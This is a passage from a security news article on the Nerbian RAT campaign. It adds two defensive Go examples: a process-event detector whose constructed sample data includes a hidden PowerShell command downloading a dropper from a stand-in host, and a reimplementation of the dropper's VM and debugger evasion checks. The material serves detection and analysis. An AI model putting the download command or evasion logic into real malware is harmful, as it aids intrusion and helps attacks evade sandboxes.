A newly discovered remote access trojan, Nerbian RAT, comes with a rich feature set, including mechanisms to evade detection and frustrate analysis by researchers.
The malware is written in Go, compiled as a 64-bit binary that is readily portable across platforms, and it is currently distributed through a small-scale email campaign that uses macro-laced document attachments.
The email campaigns were discovered by researchers at Proofpoint, who released a report today on the new Nerbian RAT malware.
Impersonating the WHO
The campaign distributing Nerbian RAT impersonates the World Health Organization (WHO); the emails purport to deliver COVID-19 information to the targets.
The RAR attachments contain Word documents laced with malicious macro code. If a target opens one in Microsoft Office and enables content, the macro drops a .bat file, which runs a PowerShell command that downloads a 64-bit dropper.
The dropper, named “UpdateUAV.exe,” is also written in Go and is packed with UPX to keep the file size manageable.
UpdateUAV borrows code from several open-source GitHub projects to implement a battery of anti-analysis and detection-evasion checks that run before Nerbian RAT is deployed.
The dropper also establishes persistence by creating a scheduled task that launches the RAT every hour.
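The infection chain above (Office document spawning a .bat, the .bat spawning a downloading PowerShell, and an hourly scheduled task for persistence) is visible in process-creation telemetry. The following is an added example, not code from Proofpoint or from the Nerbian RAT authors: a small detector run over constructed Sysmon-style process events. The file names, paths, URL (.invalid TLD) and the assumption that the task is created through schtasks.exe are all constructed for illustration; the report does not publish those details.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is a minimal process-creation record (the shape of Sysmon event 1 / Security 4688).
type Event struct {
	Image, ParentImage, CommandLine string
}

// officeApps are the parent images that should never be spawning a shell.
var officeApps = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}

// downloadRe matches the usual PowerShell download primitives used by macro stagers.
var downloadRe = regexp.MustCompile(`(?i)downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer`)

// base returns the lower-cased file name of a Windows path.
func base(p string) string {
	i := strings.LastIndexAny(p, `\/`)
	return strings.ToLower(p[i+1:])
}

// Detect applies three rules derived from the described chain and returns one alert per hit.
func Detect(events []Event) []string {
	var alerts []string
	for _, e := range events {
		img, parent := base(e.Image), base(e.ParentImage)
		cmd := strings.ToLower(e.CommandLine)
		switch {
		case officeApps[parent] && img == "cmd.exe" && strings.Contains(cmd, ".bat"):
			alerts = append(alerts, "office-spawned-bat: "+e.CommandLine)
		case parent == "cmd.exe" && img == "powershell.exe" && downloadRe.MatchString(e.CommandLine):
			alerts = append(alerts, "bat-powershell-download: "+e.CommandLine)
		// Assumption: the dropper registers its task via schtasks.exe. If it uses the Task
		// Scheduler API instead, Security event 4698 carries the same trigger information.
		case img == "schtasks.exe" && strings.Contains(cmd, "/create") && strings.Contains(cmd, "/sc hourly"):
			alerts = append(alerts, "hourly-task-persistence: "+e.CommandLine)
		}
	}
	return alerts
}

// SampleEvents is a constructed event stream mirroring the chain; paths and names are invented.
var SampleEvents = []Event{
	{`C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`, `C:\Windows\explorer.exe`,
		`"WINWORD.EXE" /n "C:\Users\u\Downloads\constructed-who-update.doc"`},
	{`C:\Windows\System32\cmd.exe`, `C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE`,
		`cmd.exe /c C:\Users\u\AppData\Local\Temp\run.bat`},
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\System32\cmd.exe`,
		`powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/UpdateUAV.exe','C:\Users\u\AppData\Local\Temp\UpdateUAV.exe')"`},
	{`C:\Windows\System32\schtasks.exe`, `C:\Users\u\AppData\Local\Temp\UpdateUAV.exe`,
		`schtasks /create /sc hourly /tn "ConstructedTask" /tr C:\constructed\path\MoUsoCore.exe`},
	// Benign noise: an interactive shell from Explorer should not alert.
	{`C:\Windows\System32\cmd.exe`, `C:\Windows\explorer.exe`, `cmd.exe /c dir`},
}

func main() {
	for _, a := range Detect(SampleEvents) {
		fmt.Println(a)
	}
}
```

The three rules are deliberately narrow (Office parent, cmd.exe parent, hourly trigger) so they fire on this chain without flooding on ordinary PowerShell use; in production you would widen the parent set and pair the download rule with network telemetry.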
Proofpoint summarizes the anti-analysis checks as follows:
- Check for the existence of reverse engineering or debugging programs in the process list
- Check for suspicious MAC addresses
- Query WMI for disk names and check whether they look like real hardware rather than a hypervisor's virtual disk
- Check if the hard disk size is below 100GB, which is typical for virtual machines
- Check if there are any memory analysis or tampering detection programs present in the process list
- Check the amount of time elapsed since execution and compare it with a set threshold
- Use the IsDebuggerPresent API to determine if the executable is being debugged
Together, these checks make it much harder to get the RAT running in a sandboxed or virtualized environment, which helps the operators stay undetected for longer. They are not insurmountable, though: an analyst can patch the checks out of the dropper, or give the analysis VM a realistic profile (a non-hypervisor MAC address, a disk larger than 100GB with a vendor-looking model string, and no debugger or monitoring tools in the process list) so that none of them fire.
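To see which of the listed checks a given analysis VM would trip, here is an added example written for this page (not code from Proofpoint or from the dropper itself): the checks are reimplemented in Go, the dropper's own language, as pure decision logic over a snapshot of host facts, so the same code can be run against a constructed snapshot or fed real values collected on the VM. The hypervisor MAC prefixes are well-known vendor OUIs; the tool names, the virtual-disk model substrings and the direction of the timing check are assumptions, since the report does not publish the dropper's exact lists or threshold.

```go
package main

import (
	"fmt"
	"net"
	"strings"
	"time"
)

// Finding is one tell from the report's list that a Nerbian-style dropper would act on.
type Finding struct {
	Check  string
	Detail string
}

// HostFacts is the snapshot the checks run against. On a real analysis VM you would fill it
// from the process list, the adapters, WMI Win32_DiskDrive and IsDebuggerPresent; the test
// below feeds constructed values instead.
type HostFacts struct {
	Processes  []string      // image names from the process list
	MACs       []string      // adapter MAC addresses, colon or dash separated
	DiskModels []string      // Win32_DiskDrive.Model strings
	DiskBytes  uint64        // size of the system disk
	Elapsed    time.Duration // wall-clock time since the dropper started
	Debugger   bool          // result of IsDebuggerPresent
}

// vmOUIs maps well-known hypervisor MAC prefixes to the vendor that assigns them.
var vmOUIs = map[string]string{
	"00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware", "00:50:56": "VMware",
	"08:00:27": "VirtualBox", "00:15:5d": "Hyper-V", "52:54:00": "QEMU/KVM", "00:1c:42": "Parallels",
}

// analysisTools is an assumed example list of debugger, monitoring and memory-analysis
// processes; the report does not publish the names the dropper actually looks for.
var analysisTools = []string{
	"x64dbg.exe", "x32dbg.exe", "ollydbg.exe", "ida.exe", "ida64.exe", "windbg.exe",
	"procmon.exe", "procmon64.exe", "wireshark.exe", "processhacker.exe", "pe-sieve64.exe",
}

// vmDiskMarkers is likewise assumed: substrings that give away a virtual disk in its model string.
var vmDiskMarkers = []string{"VBOX", "VMWARE", "QEMU", "VIRTUAL"}

// MinDiskBytes is the 100GB threshold the report attributes to the dropper.
const MinDiskBytes uint64 = 100 << 30

func normMAC(mac string) string {
	return strings.ToLower(strings.ReplaceAll(mac, "-", ":"))
}

// Audit returns every check that would fire on the given host. maxElapsed is the dropper's
// timing threshold; the report gives neither its value nor its direction, so this example
// assumes that running longer than the threshold (as when single-stepped) is the tell.
func Audit(f HostFacts, maxElapsed time.Duration) []Finding {
	var out []Finding
	for _, p := range f.Processes {
		for _, tool := range analysisTools {
			if strings.EqualFold(p, tool) {
				out = append(out, Finding{"process list", p})
				break
			}
		}
	}
	for _, mac := range f.MACs {
		if m := normMAC(mac); len(m) >= 8 {
			if vendor, ok := vmOUIs[m[:8]]; ok {
				out = append(out, Finding{"MAC address", mac + " (" + vendor + ")"})
			}
		}
	}
	for _, model := range f.DiskModels {
		up := strings.ToUpper(model)
		for _, marker := range vmDiskMarkers {
			if strings.Contains(up, marker) {
				out = append(out, Finding{"WMI disk name", model})
				break
			}
		}
	}
	if f.DiskBytes < MinDiskBytes {
		out = append(out, Finding{"disk size", fmt.Sprintf("%d GB < 100 GB", f.DiskBytes>>30)})
	}
	if f.Elapsed > maxElapsed {
		out = append(out, Finding{"elapsed time", f.Elapsed.String()})
	}
	if f.Debugger {
		out = append(out, Finding{"IsDebuggerPresent", "true"})
	}
	return out
}

// LocalMACs collects the adapter addresses of the machine this runs on (stdlib, any OS).
func LocalMACs() []string {
	var macs []string
	ifs, err := net.Interfaces()
	if err != nil {
		return macs
	}
	for _, i := range ifs {
		if len(i.HardwareAddr) > 0 {
			macs = append(macs, i.HardwareAddr.String())
		}
	}
	return macs
}

func main() {
	// Only the MAC check uses live data here; fill the other fields from your VM's tooling.
	for _, f := range Audit(HostFacts{MACs: LocalMACs(), DiskBytes: MinDiskBytes}, time.Hour) {
		fmt.Printf("%-18s %s\n", f.Check, f.Detail)
	}
}
```

An empty result from Audit means the VM passes the listed checks as this example models them; it does not mean the dropper has no other tells, so treat it as a hardening checklist rather than a guarantee.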
Nerbian RAT features
The trojan is downloaded as “MoUsoCore.exe” and is saved to…